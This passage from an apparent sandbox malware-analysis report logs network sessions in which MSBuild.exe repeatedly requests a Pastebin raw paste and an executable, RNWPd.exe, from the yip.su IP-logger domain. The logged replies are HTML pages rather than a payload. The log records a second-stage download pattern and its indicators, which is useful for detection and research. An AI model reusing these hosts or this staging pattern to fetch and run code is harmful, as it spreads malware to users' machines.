.logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div
2024-09-16 19:22:40 UTC	160	IN	Data Raw: 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: .style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:22:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	49771	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:46 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:22:46 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433a26f91943e0-EWR
2024-09-16 19:22:46 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:22:46 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:22:46 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:22:46 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:22:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	49772	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:46 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:22:47 UTC	898	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:22:46 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:22:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HgJU5OZYrSRjVTPIYJGGMd84i6lBssp8S5e0szreyMKxceeTkzG00penU%2FFlgxTNBNmkfveBvfbDb26TrEJo7ywmglgavwHZPAu3xG%2FkykRVKlPNSISdPt4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433a2b1d9f43ad-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:22:47 UTC	471	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:22:47 UTC	1369	IN	Data Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
2024-09-16 19:22:47 UTC	1369	IN	Data Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
2024-09-16 19:22:47 UTC	1369	IN	Data Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
2024-09-16 19:22:47 UTC	1369	IN	Data Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
2024-09-16 19:22:47 UTC	1369	IN	Data Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
2024-09-16 19:22:47 UTC	154	IN	Data Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:22:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	49773	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:52 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:22:52 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433a4e4ef14406-EWR
2024-09-16 19:22:52 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:22:52 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:22:52 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:22:52 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:22:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	49775	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:53 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:22:53 UTC	900	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:22:53 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:22:53 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r6PjzVZkoUeBbaItGycROLcZjfHAFXaOps1EFtAFHaoH%2FJsfQkN3U%2BZ7sOaAr2J2rzFCVYfy8biUEL1Fil9VVUNlfzV0y9Vk3%2FQVKly2Uu810V2KeszQSUk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433a546baa78db-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:22:53 UTC	469	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
